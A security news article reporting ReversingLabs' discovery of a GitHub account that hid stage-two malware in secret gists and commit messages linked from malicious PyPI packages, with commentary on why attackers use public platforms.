Security researchers have recently identified a GitHub account exploiting lesser-known features of the platform to host stage-two malware, revealing a new level of sophistication in how cybercriminals use public services for their operations.
In an emerging trend, hackers are increasingly repurposing popular public platforms as bases for their malicious activities. They’ve been using public code repositories, file-sharing services, and even messaging apps to house and distribute malware, while running command-and-control (C2) operations through these channels. What’s more, they are finding innovative ways to use software-as-a-service (SaaS) platforms in ways that go unnoticed.
One such actor, operating under the GitHub account name *yeremyvalidslov2342*, was recently identified by ReversingLabs on December 19. This actor, referred to as “Yeremy,” utilized two under-the-radar GitHub features—gists and commits—to secretly deliver malicious payloads.
Exploiting GitHub’s Tools for Cyber Attacks
Typically, cybercriminals exploit public code repositories by posting malicious files under disposable accounts—a simple tactic that often leads to quick detection and removal by administrators.
Yeremy, however, took a more sophisticated approach. First, they released a series of packages to the Python Package Index (PyPI), a common target for attackers. These packages appeared to be legitimate libraries for network proxying, but hidden within their setup files was a Base64-encoded string that linked to a concealed GitHub “gist.”
Gists, a feature on GitHub, are like lightweight repositories where developers can share code snippets without creating full projects. Gists can be either public or “secret,” meaning they aren’t searchable or visible to the general public but can still be shared with specific individuals.
The gist linked in the PyPI packages contained stage-two malware. This approach is rare, with only one other known instance, reported in 2019 by Trend Micro, where gists were used similarly for malicious purposes involving a Slack backdoor.
Yeremy was also connected to another PyPI package with a malicious setup file. In this case, when executed, the package cloned a legitimate-looking GitHub project called PySocks. The malware wasn’t in the repository itself; it was hidden in the commit message used to describe the project.
The Appeal of Public Services for Cybercriminals
Using public platforms like GitHub offers hackers several advantages. Operating from one’s infrastructure provides resilience, but using shared and open-source resources enhances stealth.
“Some malware authors fear detection,” says Karlo Zanki, the report’s author. However, he adds, “if malicious code is properly obfuscated, public services aren’t adept at detecting it.”
Zanki also points out the challenges that repositories like npm and PyPI face, as they process thousands of packages daily with limited capacity for monitoring. While these repositories use traditional antivirus tools, many malicious packages still slip through the cracks. This leaves users with the burden of protecting themselves.
For hackers, public services present a compelling option: creating an account on a popular site is quicker, easier, and cheaper than setting up a traditional infrastructure. Plus, the maintenance and uptime of these sites are managed by the hosting company, ensuring reliability. Traffic to well-known sites doesn’t raise the same red flags as connections to unknown servers, and if an account is deactivated, the hacker can quickly create a new one.
This case highlights how cybercriminals are continually adapting their methods to evade detection, using legitimate platforms in novel ways to conduct their operations. As these tactics evolve, the cybersecurity community must stay vigilant and develop new strategies to counter these sophisticated threats.
